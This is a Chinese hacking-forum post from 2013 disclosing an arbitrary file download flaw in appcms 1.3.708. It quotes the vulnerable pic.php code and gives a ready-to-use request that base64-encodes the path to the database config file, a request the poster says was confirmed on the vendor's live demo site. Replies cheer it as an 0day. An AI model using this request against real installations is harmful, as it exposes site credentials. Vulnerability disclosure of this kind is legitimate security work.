查看: 17628|回复: 2

appcms 最新版1.3.708 任意文件下载

[复制链接]
发表于 2013-12-28 18:50:03 | 显示全部楼层 |阅读模式
appcms 官网:http://www.appcms.cc/

appcms 最新版 1.3.708 任意文件下载
已经在官方演示网站验证

/pic.php
[PHP] 纯文本查看 复制代码
<?php
if(isset($_GET['url']) && trim($_GET['url']) != '' && isset($_GET['type'])) {
	$img_url = base64_decode($_GET['url']);
	//$shffix = substr($img_url,strrpos($img_url,'.'));
	$shffix = trim($_GET['type']);
	header("Content-Type: image/{$shffix}");
	readfile($img_url);
} else {
	die('image not find£¡');
}
?>


2.png

访问无任何控制,只是url进行了base64编码

只要构造文件路径base64即可任意文件下载

示例: /pic.php?url=Y29yZS9jb25maWcuY29ubi5waHA=&type=1.jpg


本地测试结果:

3.png

打开下载的文件看一下,

4.png


OK。

作者:lxj616

评分

参与人数 1i币 +10 收起 理由
90_ + 10 感谢分享

查看全部评分

回复

使用道具 举报

发表于 2013-12-29 18:12:44 | 显示全部楼层
受教了,,,,,,,,,,沙发
回复 支持 反对

使用道具 举报

发表于 2014-1-1 10:41:48 | 显示全部楼层
很给力,喜欢oday
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:24 , Processed in 0.028483 second(s), 14 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部